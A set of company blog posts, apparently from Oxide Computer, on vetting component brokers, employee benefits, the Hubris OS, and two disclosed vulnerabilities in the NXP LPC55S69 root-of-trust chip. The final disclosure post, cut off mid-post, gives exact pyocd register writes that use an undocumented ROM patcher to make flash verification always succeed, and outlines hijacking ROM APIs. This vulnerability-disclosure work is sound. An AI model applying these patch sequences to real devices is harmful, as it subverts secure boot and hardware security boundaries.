Allocation. A term no supply chain professional wants to hear. Even more so when you’re a start-up in a critical test phase of your new product which has yet to launch. Founders, investors, manufacturing partners and others, all anxious for an update. That timing device, tiny in size, but mighty in nature, gating your entire build process. Your product can’t run without it. There are no suitable alternates and there is no supply via your normal channels. There is, however, a large supply showing in the broker market. Over 100K. Wow, score! You may have just solved your high-profile supply constraint. Now the only thing left to decide is which of these companies will get your business.

Before you get too excited though, you need to pause, step back, and analyze the situation. Could there really be over 100K of this highly constrained part on the broker market? That $0.38 part is showing for between $1.10 and $7.08 on the broker market. How could there be that much variation? Is the higher priced part “real” while the lower priced part is possibly counterfeit or stolen?

What would happen if you were to receive a counterfeit part? The brokers typically all provide some sort of generic “guarantee” on their website. How bad could it be? You could order the part, have it tested, realize it’s not real, and get your money back, right? Sounds easy, though it rarely is. From reading reviews of brokers, speaking with people who have had bad experiences, and my own search for broker parts, I’ve learned that many broker websites are not legitimate.

Embrace your inner pessimist and begin your search being wary of everyone. While there are certain countries which automatically throw up red flags, there are also plenty of US based companies I wouldn’t consider doing business with. It’s ok to be pessimistic now and then. You need to protect your company, your product, and your reputation. What sorts of issues could you face with parts purchased from a broker? You could end up with parts that have old date codes, have not been stored correctly in humidity controlled / ESD bags, are damaged, or are downright counterfeit. Things to look for when evaluating an online broker:

  1. Misspellings & Poor Grammar. Sure, we all make mistakes from time to time. I had to make sure “misspellings” was spelled correctly! However, a professional website should not have misspellings, blatant grammar issues or obviously poor translation.

  2. Authorized Distributor Claims. Make sure to go to the actual manufacturer’s website and look up their authorized distributors. If a broker claims they are authorized and aren’t listed, do not order anything, ever.

  3. 100% Guaranteed Claims – Authenticity, Quality, etc. Read the superfine print. Understand what is being guaranteed. A phrase such as “guaranteed to function like original part” should make you pause, given the use of the word “like”. Most sites seem to offer some feel-good blurb on how they’ve had the parts tested in-house or by a third-party tester and results are available. What are the qualifications of the tester? What were they testing? Some websites will even tell you they support you having the part tested. If your tests show the part is not original, you can return the part with your test data. However, reading deeper into their return policy, often found in a different section of their website, will reveal that you cannot return any part that has been opened and / or is not the full quantity ordered. Return windows may also be abnormally short, not affording you enough time to test the parts. Unfortunately for you, in order to perform a physical and electrical verification, you must open the packaging and use several for testing purposes. You have now invalidated your ability to return the part.

  4. Payment Terms – Be extremely cognizant of payment terms, types of payment accepted, and the entity you are paying. Research the payee and bank information. There are certain payment methods that are more secure and better for this type of transaction than others.

  5. Do Your Research – Spend some time reading online reviews. Take note of who / where any good reviews are coming from. Pay closer attention to the negative reviews. While it’s true more people are likely to leave a negative review than a positive review, if you see consistency in the negative reviews, it’s probably best to move along. Common negative reviews of brokers include no communication after payment sent, payment sent and part not actually in stock, payment sent and part not received, and parts do not work as expected (old date code, damaged, counterfeit). A quick search can open your eyes to a lot of questionable activities!

After checking out many of the websites showing stock on the part you desperately need, you’re back to square one. You’ve realized you can’t possibly trust one of these unheard-of websites to provide an instrumental component in your product. You’ve spoken with the manufacturer and distributors and nothing is available, not even samples. What next? Give up? Tell your founders and investors the timeline is in jeopardy and all forward progress must come to a halt? None of those sound like great alternatives.

I’m blessed in that I have a history in the broker market from a previous job in the computer industry. I’ve been exposed to all sorts of people and stories, some that make you just shake your head in disbelief. I already have a handful of people I feel comfortable with and enjoy working with. These are a few areas I look at when deciding to work with any broker.

  1. Certifications (ISO, OSHA, R2, eStewards, etc) – While these certifications are typically for manufacturers and / or refurbishers, it gives me a sense of comfort in knowing that a company has achieved any of these certifications. Can a certification be “bought”? Sure, though no one involved would admit it. Don’t make this your only deciding factor but do take it into account. Physical site visits can help clarify any outstanding questions.

  2. Length of Time in Business – The good ones survive the times. Some not-so-great ones survive as well. Some new ones have yet to make a name for themselves but may be great options and provide amazing customer service. Or, they may cut corners to try and increase the bottom line. Do your research and talk to respected members of the secondary market community.

  3. Reputation – Not everyone will agree on a binary assignment of “good” or “bad” for a company. Again, speak with people in the industry about the company, its leadership, and its employees. Do your research on how the company started, how they’ve grown and changed over time, employee turnover, focus for the future, etc.

  4. Component Testing – As we’ve seen, many companies say they do component testing to verify legitimacy of a part. Ask questions, ask to see sample reports, inquire where they do their testing (in-house, 3rd party), etc. You may even consider asking if you can be present during the testing. You can learn a lot from how that question is answered, even if you don’t plan on actually being present.

  5. Warranty – Do they offer the same level of warranty as the manufacturer? What is covered by the warranty? How are warranty claims made?

  6. Trust – Trust the people you’re going to be working with and choose people you’re going to enjoy working with. There are a lot of good brokers out there, so you do have options. Find one you sync with, and the relationship will be off to a positive start.

In the end, choosing a broker to work with is both a tactical and personal choice. We don’t often get to choose who we work with, but when presented with an opportunity to do so, make sure you choose wisely. The quality and security of your product depend on it, and oftentimes, so does your sanity.

Benefits as a Reflection of Values Oxide Computer Company Blog

“We offer the best health insurance we could find” is what we promise in our job postings. On paper, this is accurate: the health insurance Oxide offers is the best plan we can find that is offered to small businesses.

What we left unsaid until now is that the best health insurance offered to small businesses is, in fact, not very good at all if you don’t neatly fit into a narrow demographic; the bitter irony is that the US healthcare system isn’t designed for those of us who rely on it the most. And life-saving treatments that aren’t needed by able-bodied cisgender people are, more often than not, deemed “not medically necessary” in off-the-shelf insurance policies simply because there is no law to require their coverage. In our society’s bizarre and accidental system, we rely on employers to provide benefits everyone should have, including healthcare, retirement plans, and dependent care.

When I came out as trans and started seeking medical care, I worked at a large employer that directly paid for the medical costs of its employees and dictated how their insurance networks process claims. I had the benefits I needed because other trans people fought for them and the company could unilaterally choose to provide them. Startups don’t have this luxury and are at the whims of insurance companies to keep the cost of hiring and retaining employees manageable. Meanwhile, insurers put profit over care, and won’t budge on off-the-shelf benefits plans unless Congress forces the issue – yet as I write this, lawmakers across the country are either ignoring us or actively stripping away our right to get the healthcare we need, so we’re not holding our breath.

With this in mind, I was initially uneasy about applying to Oxide because we didn’t make our benefits clear to prospective applicants. But I still applied — not out of blind faith, but because I felt a company built on these values would put its people first and work to provide what I needed. Shortly after I started, despite insurance companies not budging even an inch, our CEO Steve announced a reimbursement arrangement that would cover $10,000 of out-of-pocket healthcare expenses for gender-related healthcare per year. This isn’t perfect, but it’s a damn good start.

Future applicants shouldn’t need to put this much faith in us upholding our values in order to be comfortable about applying, though. Here’s a much clearer summary of our benefits:

  • We offer the best medical, dental, and vision insurance plans we can find as a small employer; premiums are 100% paid by Oxide for both employees and dependents.

  • We offer an optional FSA plan for out-of-pocket healthcare and dependent care expenses.

  • We reimburse (through an HRA) up to $17,000 annually: $10,000 annually for gender affirmation or infertility expenses, $5,000 annually for hearing and laser eye surgery expenses, and $2,000 annually for dental and miscellaneous healthcare expenses. The HRAs cover out-of-pocket expenses regardless of whether insurance covers them partially or not at all.

The bottom line: Where our insurers fall short, we will work to meet our employees where they need us to be.

As with our compensation model, the benefits we provide embody our mission, principles, and values: We can’t focus on our mission if we’re distracted by healthcare expenses. Our principles of integrity, honesty, and decency compel us to care for our teammates and their families. And our approach to benefits intersects with several of our values:

  • It is driven by our empathy. Even if we don’t have the context for someone else’s needs, we don’t need it: none of us ever want to have to worry about healthcare expenses for ourselves, our partners, or our families, and we wouldn’t wish it on each other. We understand that this approach is necessary and important, even if some of us don’t directly benefit.

  • It is a step toward building a more diverse team. In this regard, we are not meeting the same standard to which we hold ourselves with our other values. We strive to change that by embracing the needs of our current team as well as those of prospective future teammates. Benefits are a critical part of what employers bring to the table for candidates, and we don’t want to inhibit people from applying to Oxide because of the perception that small companies can only provide meager coverage that doesn’t work for them. While our compensation model ensures we have no pay gap, our approach ensures that people relying more on these vital benefits are still getting paid the same as their peers. Every member of the team has different needs, and we will do our best to address as many of them as we can.

  • It is a reflection of our resilience. We will do everything within our power to take care of our employees. We will continue to fight our insurers to provide for basic healthcare needs, and when they fall short, we will find other ways to provide for those needs (such as offering HRAs) while we continue to fight. We will never stop advocating for our employees.

  • It is a fundamental responsibility to our teammates. We don’t treat healthcare benefits as a “perk”: it is a basic need for all of us. And while it is tiring to continue to fight against an uncaring and unwavering healthcare system only to make incremental progress, we know that we must do so to keep our mission in sight.

Finally, in the spirit of transparency: we’ve made our benefits information public starting today. These are close to the same documents employees see when signing up for benefits (with some information only relevant for employees removed). We’re working to provide additional information for specific situations that we’re aware of — and we know that our benefits are not complete; there are innumerable needs none of us have experienced or thought of.

We share our benefits information for two important reasons: first, we want applicants to be able to learn everything we know about our benefits so that they feel confident in applying even in the face of a healthcare need that is not commonly covered; second, we want to give employees at other similarly-situated companies tools (such as suggesting HRAs) to help fight for the healthcare coverage they need. We have a responsibility to take care of our employees, but we also have a responsibility to make our industry a better place to work for everyone.

Another vulnerability in the LPC55S69 ROM Oxide Computer Company Blog

Here at Oxide, we continue to work on building servers as they should be. Last year, we discovered an undocumented hardware block in the LPC55S69 (our chosen part for our product’s Root of Trust implementation) that could be used to violate security boundaries. That issue highlighted the importance of transparency as an Oxide value, which is why we are bringing another recently discovered vulnerability to light today.

While continuing to develop our product, we discovered a buffer overflow in the ROM of the LPC55S69. This issue exists in the In-System Programming (ISP) code for the signed update mechanism, which lives in ROM. The vulnerability allows an attacker to gain non-persistent code execution with a carefully crafted update, regardless of whether the update is signed. This can be used to circumvent restrictions when the chip is fully locked down, and also to extract the device’s DICE Unique Device Secret (UDS). Because this issue exists in ROM, there is no known workaround other than disabling all hardware and software paths to enter ISP mode. CVE-2022-22819 has been assigned for this vulnerability.

Finding two separate issues in the same chip only strengthens Oxide’s assertion that keeping code proprietary does not improve product security, and that hardware manufacturers such as NXP should make their ROM source available for customer review.

Updates are hard

Before discussing the exploit, it’s worth thinking about the higher level problem: how do you update your software on a microcontroller once it leaves the factory? This turns out to be a tricky problem where a bug can result in a non-functional device. To make this problem easier, chip makers like NXP will provide some method to put the chip in a mode that allows for safe modification of flash independent of installed firmware. NXP offers this via its In System Programming (ISP) mode.

ISP mode allows a host (typically a general purpose computer) to read and write various parts of the chip including flash by sending commands to the target over a variety of protocols. The LPC55S69 supports receiving ISP commands over UART, SPI, I2C, and, on variants that include the necessary peripheral, CAN. The LPC55S69 can be configured to require code be signed with a specific key. In this configuration, most commands are restricted and changes to the flash can only come via the receive-sb-file command.

The update format

The receive-sb-file ISP command uses the SB2 format. This format includes a header followed by a series of commands which can modify the flash or start code execution. Confidentiality and integrity of an update are provided by encrypting the commands with a key programmed at manufacturing time, inserting a secure digest of the commands in the update header, and finally signing the header. The C representation of the first part of the header looks like the following:

struct sb2_header_t {
        uint32_t nonce[4];

        uint32_t reserved;
        uint8_t m_signature[4];
        uint8_t m_majorVersion;
        uint8_t m_minorVersion;

        uint16_t m_flags;
        uint32_t m_imageBlocks;
        uint32_t m_firstBootTagBlock;
        section_id_t m_firstBootableSectionID;

        uint32_t m_offsetToCertificateBlockInBytes;

        uint16_t m_headerBlocks;

        uint16_t m_keyBlobBlock;
        uint16_t m_keyBlobBlockCount;
        uint16_t m_maxSectionMacCount;
        uint8_t m_signature2[4];

        uint64_t m_timestamp;
        version_t m_productVersion;
        version_t m_componentVersion;
        uint32_t m_buildNumber;
        uint8_t m_padding1[4];
};

The bug

The SB2 update is parsed sequentially in 16-byte blocks. The header identifies some parts of the update by block number (e.g. block 0 is at byte offset 0, block 1 at byte offset 16 etc). The bug comes from improper bounds checking on the block numbers. The SB2 parser in ROM copies the header to a global buffer before checking the signature. Instead of stopping when the size of the header has been copied (a total of 8 blocks or 128 bytes), the parsing code copies up to m_keyBlobBlock number of blocks. In a correctly formatted header, m_keyBlobBlock will refer to the block number right after the header, but the code does not check the bounds on this. If m_keyBlobBlock is set to a much larger number the code will continue copying bytes beyond the end of the global buffer, a classic buffer overflow.
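To make the flaw concrete, here is a hypothetical sketch (in Rust for brevity; the actual ROM is C) of the header copy with the missing bounds check added. All names here (`copy_header_blocks`, `key_blob_block`, the buffer layout) are illustrative, not NXP's code; only the 16-byte block size and the 8-block (128-byte) header come from the description above.

```rust
const BLOCK_SIZE: usize = 16; // SB2 is parsed in 16-byte blocks
const HEADER_BLOCKS: usize = 8; // sb2_header_t is 128 bytes = 8 blocks

/// Copy the header out of an update image, treating the
/// attacker-controlled m_keyBlobBlock field as the copy bound.
/// Returns None where the vulnerable ROM would instead keep copying
/// and overflow its fixed-size global buffer.
fn copy_header_blocks(
    update: &[u8],
    key_blob_block: u16,
) -> Option<[u8; HEADER_BLOCKS * BLOCK_SIZE]> {
    let nbytes = key_blob_block as usize * BLOCK_SIZE;
    // The check the ROM lacked: refuse any header that claims to
    // extend past the destination buffer (or past the input itself).
    if key_blob_block as usize > HEADER_BLOCKS || nbytes > update.len() {
        return None;
    }
    let mut buf = [0u8; HEADER_BLOCKS * BLOCK_SIZE];
    buf[..nbytes].copy_from_slice(&update[..nbytes]);
    Some(buf)
}
```

With m_keyBlobBlock set to its correct value of 8 the copy succeeds; any larger value is exactly the overflow described above and is rejected.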


The full extent of this bug depends on system configuration, with code execution possible in many circumstances. A simple version of this attack can enable SWD access (normally disabled during ISP mode) by jumping to existing code in ROM. A more sophisticated attack has been demonstrated as a proof-of-concept providing arbitrary code execution. While code execution via this vulnerability does not directly provide persistence, attack code executes with the privileges of ISP mode and can thus modify flash contents. If the system is configured for secure boot and sealed via the Customer Manufacturing Programming Area (CMPA), modifications of code stored in flash will be detected on subsequent boots. Additionally, ISP mode executes while the DICE UDS (Unique Device Secret) is still accessible, allowing for off-device derivation of keys based on the secret.


Because this is an issue in the ROM, the best mitigation without replacing the chip is to prevent access to the vulnerable SB2 parser. Disabling ISP mode and not using flash recovery mode will avoid exposure, although this does mean the chip user must come up with alternate designs for those use cases.

The NXP ROM also provides an API for applying an SB2 update directly from user code. Using this API in any form still provides a potential path to expose the bug. Checking the signature on an update using another ROM API before calling the update API would provide verification that an update is from a trusted source. This is not the same thing as verifying that the update data is correct or not malicious, but signature verification does provide a potential mechanism for some degree of confidence if using the SB2 update mechanism cannot be avoided.


As exciting as it was to find this issue, it was also surprising given NXP’s previous statement that the ROM had been reviewed for vulnerabilities. While no review is guaranteed to find every issue, this issue once again highlights that a single report is no substitute for transparency. Oxide continues to assert that open firmware is necessary for building a more secure system. Transparency in what we are building and how we are building it will allow our customers to make a fully informed choice about what they are buying and how their system will work. We, once again, invite everyone to join us in making open firmware the industry baseline.



Disclosure timeline:

  • Oxide discovers the vulnerability while attempting to understand the SB2 update process
  • Oxide discloses the vulnerability to NXP
  • NXP PSIRT acknowledges the report
  • NXP PSIRT acknowledges the vulnerability
  • NXP discloses the issue in an NXP Security Bulletin (NDA required) and confirms that a new ROM revision, and thus new part revisions, are required to correct the vulnerability in affected product lines
  • Oxide discloses the vulnerability as CVE-2022-22819

Hubris and Humility Oxide Computer Company Blog

When we started Oxide, we knew we were going to take a fresh look at the entire system. We knew, for example, that we wanted to have a true hardware root of trust and that we wanted to revisit the traditional BMC. We knew, too, that we would have our own system software on each of these embedded systems, and assumed that we would use an existing open source operating system as a foundation. However, as we waded deeper into these embedded systems, and especially into their constraints of security and robustness, we found that what we wanted out of the existing operating systems wasn’t necessarily what they offered (or even wanted to offer).

As time went on in early 2020 and we found ourselves increasingly forcing existing systems out of the comfort of their design centers, we wondered: was our assumption of using an existing system wrong? Should we in fact be exploring our own de novo operating system? In particular, our colleague Cliff Biffle, who had a ton of experience with both Rust and embedded systems, had a vision for what such a system might look like (namely, the system that he had always wanted for himself!). Cliff dove into a sketch of his ideas, giving the nascent system a name that felt perfectly apt: Hubris.

After just a few weeks, Cliff’s ideas were taking concrete shape, and it was clear that there was a lot to like: the emerging Hubris was an all-Rust system that was not distracting itself by accommodating other runtimes; it was microkernel-based, allowing for safety and isolation; it employed a strictly synchronous task model, allowing it to be easily developed and comprehended; and it was small and light, allowing it to fit into some of the tight spots we envisioned for it. But for me, it was the way Cliff thought about the building of the system that really set Hubris apart: instead of having an operating system that knows how to dynamically create tasks at run-time (itself a hallmark of multiprogrammed, general purpose systems), Cliff had designed Hubris to fully specify the tasks for a particular application at build time, with the build system then combining the kernel with the selected tasks to yield a single (attestable!) image.

This is the best of both worlds: it is at once dynamic and general purpose with respect to what the system can run, but also entirely static in terms of the binary payload of a particular application — and broadly static in terms of its execution. Dynamic resource exhaustion is the root of many problems in embedded systems; having the system know a priori all of the tasks that it will ever see liberates it from not just a major source of dynamic allocation, but also from the concomitant failure modes. For example, in Hubris, tasks can always be safely restarted, because we know that the resources associated with a task are available if that task itself has faulted! And this eliminates failure modes in which dynamic task creation in response to load induces resource exhaustion; as Cliff has quipped, it is hard to have a fork bomb when the system lacks fork itself!

Precedent for the Hubris approach can be found in other systems like library operating systems, but there is an essential difference: Hubris is a memory-protected system, with tasks, the kernel, and drivers all in disjoint protection domains. (And yes, even in memory safe languages like Rust, memory protection is essential!) In this regard, Hubris represents what we like about Rust, too: a creative solution that cuts through a false dichotomy to yield a system that is at once nimble and rigorous.

It was clear that Cliff was on the right track with Hubris, and the rest of us jumped in with gusto. For my own part, with debugging and debuggability deep in my marrow, I set to work writing the debugger that I felt that we would need — and that Hubris deserved. Following Cliff’s lead, I dubbed it Humility, and it’s been exciting for me to see the debugger and the operating system work together to yield a higher-quality system.

We have known for quite some time that we would open source Hubris: not only is open source core to our own commercial thesis at Oxide, we also believe that the open source revolution — and its many advantages for customers — are long overdue in the lowest layers of the software stack. So we were waiting for the right occasion, and the Open Source Firmware Conference afforded us an excellent one: if you are a listener of our On the Metal podcast, you heard us talk about OSFC a bunch, and it felt entirely fitting that we would kick off our own open source firmware contribution there. And while the conference starts today, the good news is that you haven’t missed anything! Or at least, not yet: the conference is virtual, so if you want to hear Cliff talk about Hubris in his own words — and it’s before 12:10 Pacific today — it’s not too late to buy a ticket! (The recording will naturally be released after the conference.)

And of course, if you just want to play with the system itself, Hubris and Humility are both now open source! Start by checking out the Hubris repo, the Hubris docs, and the Humility repo. (And if you are looking for a hardware vehicle for your exploration, take a look at the ST Nucleo-H753ZI evaluation board — a pretty capable computer for less than thirty bucks!) We believe Rust to be a part of the coming firmware revolution, and it’s exciting for us to have a system out there that embodies that belief!

Exploiting Undocumented Hardware Blocks in the LPC55S69 Oxide Computer Company Blog

At Oxide Computer, we are designing a new computer system from the ground up. Along the way we carefully review all hardware selected to ensure it meets not only functional needs but our security needs as well. This work includes reverse engineering where necessary to get a full understanding of the hardware. During the process of reverse engineering the NXP LPC55S69 ROM we discovered an undocumented hardware block intended to allow NXP to fix bugs discovered in the ROM by applying patches from on-device flash as part of the boot process. That’s important because this ROM contains the first instructions that are run on boot and stores a set of APIs that are called from user applications. Unfortunately, this undocumented block is left open and accessible to non-secure, unprivileged user code, thus allowing attackers to make runtime modifications to purportedly trusted APIs and potentially hijack future execution and subvert multiple security boundaries. This issue has been assigned CVE-2021-31532.

This vulnerability was found by pure chance. We believe that this issue would have been discovered much earlier if the source code for the ROM itself were publicly available. For us, finding and disclosing this issue has highlighted the importance of being able to audit the components in our system. Transparency is one of our values at Oxide because we believe that open systems are more likely to be secure ones.


The purpose of a secure boot process rooted in a hardware root of trust is to provide some level of assurance that the firmware and software booted on a server is unmodified and was produced by a trusted supplier. Using a root of trust in this way allows users to detect certain types of persistent attacks such as those that target firmware. Hardware platforms developed by cloud vendors contain a hardware root of trust, such as Google’s Titan, Microsoft’s Cerberus, and AWS’s Nitro. For Oxide’s rack, we evaluated the NXP LPC55S69 as a candidate for our hardware root of trust.

Part of evaluating a hardware device for use as a root of trust is reviewing how trust and integrity of code and data is maintained during the boot process. A common technique for establishing trust is to put the first instruction in an on-die ROM. If this is an actual mask ROM the code is permanently encoded in the hardware and cannot be changed. This is great for our chain of trust as we can have confidence that the first code executed will be what we expect and we can use that as the basis for validating other parts of the system. A downside to this approach is that any bugs discovered in the ROM cannot be fixed in existing devices. Allowing modification of read-only code has been associated with exploits in other generations of chips.

An appealing feature of the LPC55 is the addition of TrustZone-M. TrustZone-M provides hardware-enforced isolation allowing sensitive firmware and data to be protected from attacks against the rest of the system. Unlike TrustZone-A which uses thread context and memory mappings to distinguish between secure and non-secure worlds, TrustZone-M relies on designating parts of the physical address space as either secure or non-secure. Because of this, any hardware block that supports remapping of memory regions or that is shared between secure and non-secure worlds can potentially break that isolation. ARM recognized this risk and explicitly prohibited including their own Flash Patch and Breakpoint (FPB) unit, a hardware block commonly included in Cortex-M devices to improve debugging, in devices with TrustZone-M.

While doing our due diligence in reviewing the part, we discovered a custom undocumented hardware block by NXP that is similar to the ARM FPB but for patching ROM. While this ROM patcher is useful for fixing bugs discovered in the ROM after chip fabrication, it potentially weakens trusted boot assertions, as there is no longer a 100% guarantee that the same code is running each time the system boots. Thankfully, experimentation revealed that ROM patches are cleared upon device reset thus preventing any viable attacks against secure boot.

NXP also has a set of runtime APIs in ROM for accessing the on-board flash, authenticating firmware images, and entering in-system programming mode. These ROM APIs are expected to be called from secure mode and some, such as skboot_authenticate, require privileged mode as well. Since the ROM patcher is accessible from non-secure/unprivileged mode, an attacker can leverage these ROM APIs to gain privilege escalation by modifying the ROM API as follows:

  1. Pick a target ROM API (say flash_program) likely to be used by a secure mode application

  2. Use the ROM patcher to change the first instruction to branch to an attacker controlled address

  3. The next call into the ROM will execute the selected address

This issue can be mitigated through use of the memory protection unit (MPU) or security attribution unit (SAU), which restrict access to specified address ranges. Not all code bases will choose to enable the MPU, however: developers may consider it unnecessary overhead given the expected small footprint of a microcontroller. This issue shows why that’s a dangerous assumption. Even close examination of the official documentation would not have given any indication of a reason to use the MPU. Multiple layers of security can mitigate or lessen the effects of a security issue.

How did we find this

Part of building a secure product means knowing exactly what code is running and what that code is doing. While having first instruction code in ROM is good for measured boot (we can know what code is running), the ROM itself is completely undocumented by NXP except for API entry points. This means we had no idea exactly what code was running or if that code was correct. Running undocumented code isn’t a value-add no matter how optimized or clever that code might be. We took some time to reverse engineer the ROM to get a better idea of how exactly the secure boot functionality worked and verify exactly what it was doing.

Reverse engineering is a very specialized field but it turns out you can get a decent idea of what code is doing with Ghidra and a knowledge of ARM assembly. It also helps that the ROM code was not intentionally obfuscated so Ghidra did a decent job of turning it back into C. Using the breadcrumbs available to us in NXP’s documentation we discovered an undocumented piece of hardware related to a “ROM patch” stored in on-chip persistent storage and we dug in to understand how it works.

Details about the hardware block

NXP’s homegrown ROM patcher is a hardware block implemented as an APB peripheral at non-secure base address 0x4003e000 and secure base address 0x5003e000. It provides a mechanism for replacing up to 16 32-bit words in the ROM with either an explicit 32-bit value or a svc instruction. The svc instruction is typically used by unprivileged code to request privileged code to perform an operation on its behalf. As this provides a convenient mechanism for performing an indirect call, it is used to trampoline to a patch stored in SRAM when the patch is longer than a few words.

Figure 1. NXP patch layout

Persistent ROM patches stored in flash

NXP divides the flash up into two main parts: regular flash and protected flash. Regular flash is available to the device developer for all uses. The protected flash region holds data for device settings. NXP documents the user configurable parts of the protected flash region in detail. The documentation notes the existence of an NXP area which cannot be reprogrammed but gives limited information about what data exists in that area.

Figure 2. LPC55 flash layout

The limited documentation for the NXP area in protected flash refers to a ROM patch area. This contains a data structure for setting the ROM patcher at boot up. We’ve decoded the structure but some of the information may be incomplete. Each entry in the NXP ROM patch area is described by a structure. This is the rough structure we’ve reverse engineered:

struct rom_patch_entry {
        u8 word_count;
        u8 relative_address;
        u8 command;
        u8 magic_marker;          // Always 'U'
        u32 offset_to_be_patched;
        u8 instructions[];
};
There are three different commands defined by NXP to program the ROM patcher: a group of single-word changes, an svc change, and a patch to SRAM. For a single-word change, the addresses to be changed are written to the entries in the array at offset 0x100 along with their corresponding values in the reverse array at 0xf0. The relative_address field seems to determine whether the addresses are relative or absolute. All the patches on our system use only a single address, so the full use of relative_address may be slightly different. For an svc change, the address is written to the 0x100 array, and the instructions are copied to an offset in the SRAM region. The patch to SRAM doesn’t actually use the flash patcher; instead it adjusts values in the global state stored in SRAM.
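Based on this (possibly incomplete) reverse-engineered layout, a patch entry header can be decoded with a short script. This is our own illustrative code, not NXP's: it assumes little-endian fields and that word_count counts 32-bit words of patch data following the 8-byte header.

```python
import struct

def parse_rom_patch_entry(data: bytes) -> dict:
    """Decode one rom_patch_entry per the reverse-engineered layout:
    u8 word_count, u8 relative_address, u8 command, u8 magic_marker ('U'),
    u32 offset_to_be_patched, then the patch instruction bytes."""
    word_count, relative_address, command, magic = struct.unpack_from("<BBBB", data, 0)
    if magic != ord("U"):
        raise ValueError("bad magic_marker; expected 'U'")
    (offset_to_be_patched,) = struct.unpack_from("<I", data, 4)
    instructions = data[8 : 8 + 4 * word_count]  # assumption: words of patch data
    return {
        "word_count": word_count,
        "relative_address": relative_address,
        "command": command,
        "offset_to_be_patched": offset_to_be_patched,
        "instructions": instructions,
    }
```

Parsing all entries in the NXP area would simply repeat this, advancing past each header and its instruction bytes.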

Using the ROM patcher

Let’s show a detailed example of using the ROM patcher to change a single 32-bit word. In general, assuming the ROM patcher block starts at address 0x5003e000 and using patch slot “n” to modify a target ROM address “A” to have value “V”, we would do the following:

  1. Set bit 29 at 0x5003e0f4 to turn off all patches

  2. Write our target address A to the address register at 0x5003e100 + 4*n

  3. Write our replacement value V to the value register at 0x5003e0f0 - 4*n

  4. Set bit n in the enable register at 0x5003e0fc

  5. Clear bit 29 and set bit n in 0x5003e0f4 to use the replacement value
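Putting the five steps together, the write sequence for an arbitrary slot can be sketched as a small helper. The code and register names here are ours, not NXP's, and simply encode the layout described above: address slots ascending from offset 0x100, value slots descending from 0xf0, enable bits at 0xfc, and the control register at 0xf4.

```python
# Register map of the ROM patcher, per our reverse engineering.
PATCHER_BASE = 0x5003E000
CTRL = PATCHER_BASE + 0xF4     # control register; bit 29 disables all patches
ENABLE = PATCHER_BASE + 0xFC   # per-slot enable bits
ADDR0 = PATCHER_BASE + 0x100   # address slots grow upward from here
VAL0 = PATCHER_BASE + 0xF0     # value slots grow downward from here
DISABLE_ALL = 1 << 29

def single_word_patch(n: int, target: int, value: int) -> list[tuple[int, int]]:
    """Return the (register, value) writes that patch ROM address `target`
    to read back `value` using slot n, mirroring steps 1-5 above."""
    return [
        (CTRL, DISABLE_ALL),      # 1. turn off all patches
        (ADDR0 + 4 * n, target),  # 2. target address for slot n
        (VAL0 - 4 * n, value),    # 3. replacement value for slot n
        (ENABLE, 1 << n),         # 4. enable slot n
        (CTRL, 1 << n),           # 5. clear bit 29, select replacement mode
    ]
```

For slot 0 with target 0x13001000 and value 0xffffffff this reproduces the pyocd session shown next.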

To make this concrete, let’s modify ROM address 0x13001000 from its initial value of 0 to a new value 0xffffffff. We’ll use the first patch slot (bit 0 in 0xf4).

// Initial value at the address in ROM that we’re going to patch
pyocd> read32 0x13001000
13001000: 00000000 |….|

// Step 1: Turn off all patches
pyocd> write32 0x5003e0f4 0x20000000

// Step 2: Write the target address (0x13001000)
pyocd> write32 0x5003e100 0x13001000

// Step 3: Write the value we’re going to patch it with (0xffffffff)
pyocd> write32 0x5003e0f0 0xffffffff

// Step 4: Enable patch 0
pyocd> write32 0x5003e0fc 0x1

// Step 5: Turn on the ROM patch and set bit 0 to use replacement
pyocd> write32 0x5003e0f4 0x1

// Our replaced value
pyocd> read32 0x13001000
13001000: ffffffff |….|
Figure 3. NXP ROM patcher

We can use these same steps to modify the flash APIs. NXP provides a function to verify that bytes have been written correctly to flash:

status_t FLASH_VerifyProgram(flash_config_t *config, uint32_t start,
                             uint32_t lengthInBytes,
                             const uint32_t *expectedData,
                             uint32_t *failedAddress,
                             uint32_t *failedData);

The function itself lives at 0x130073f8 (this is after indirection via the official function call table):

pyocd> disas 0x130073f8 32
0x130073f8: 2de9f847 push.w {r3, r4, r5, r6, r7, r8, sb, sl, lr}
0x130073fc: 45f61817 movw r7, #0x5918
0x13007400: 8046 mov r8, r0
0x13007402: c1f20047 movt r7, #0x1400
0x13007406: 3868 ldr r0, [r7]
0x13007408: 5fea030a movs.w sl, r3
0x1300740c: 85b0 sub sp, #0x14
0x1300740e: 0490 str r0, [sp, #0x10]
0x13007410: 0c46 mov r4, r1
0x13007412: 08bf it eq
0x13007414: 0420 moveq r0, #4
0x13007416: 1546 mov r5, r2

We can modify this function to always return success. ARM Thumb-2 uses r0 as the return register, and 0 is the value for success, so we need to generate a movs r0, #0 instruction followed by a bx lr instruction to return. These encode as 0x2000 for the movs r0, #0 and 0x4770 for bx lr. The first instruction at 0x130073f8 is conveniently 4 bytes, so it’s easy to replace with a single ROM patch slot.
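The two 16-bit instructions share a single 32-bit patch word, with the lower halfword first in memory (little-endian), which is why the value written below is 0x47702000. A quick check of the packing:

```python
# Thumb-2 encodings for the two replacement instructions.
MOVS_R0_0 = 0x2000  # movs r0, #0  (return value: success)
BX_LR = 0x4770      # bx lr        (return to caller)

# Little-endian halfword order: movs r0, #0 occupies the low half
# of the 32-bit word, bx lr the high half.
patch_word = (BX_LR << 16) | MOVS_R0_0
assert patch_word == 0x47702000
```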

// Turn off the patcher
pyocd> write32 0x5003e0f4 0x20000000

// Write the target address
pyocd> write32 0x5003e100 0x130073f8

// Write the target value
pyocd> write32 0x5003e0f0 0x47702000

// Enable patch 0
pyocd> write32 0x5003e0fc 0x1

// Turn on the patcher and use replacement for patch 0
pyocd> write32 0x5003e0f4 0x1

// The first two instructions have been replaced
pyocd> disas 0x130073f8 32
0x130073f8: 0020 movs r0, #0
0x130073fa: 7047 bx lr
0x130073fc: 45f61817 movw r7, #0x5918
0x13007400: 8046 mov r8, r0
0x13007402: c1f20047 movt r7, #0x1400
0x13007406: 3868 ldr r0, [r7]
0x13007408: 5fea030a movs.w sl, r3
0x1300740c: 85b0 sub sp, #0x14
0x1300740e: 0490 str r0, [sp, #0x10]
0x13007410: 0c46 mov r4, r1
0x13007412: 08bf it eq
0x13007414: 0420 moveq r0, #4
0x13007416: 1546 mov r5, r2

So long as this patch is active, any call to FLASH_VerifyProgram will return success regardless of its contents.

NXP also provides a function to verify the authenticity of an image:

skboot_status_t skboot_authenticate(const uint8_t *imageStartAddr,
                                    secure_bool_t *isSignVerified);

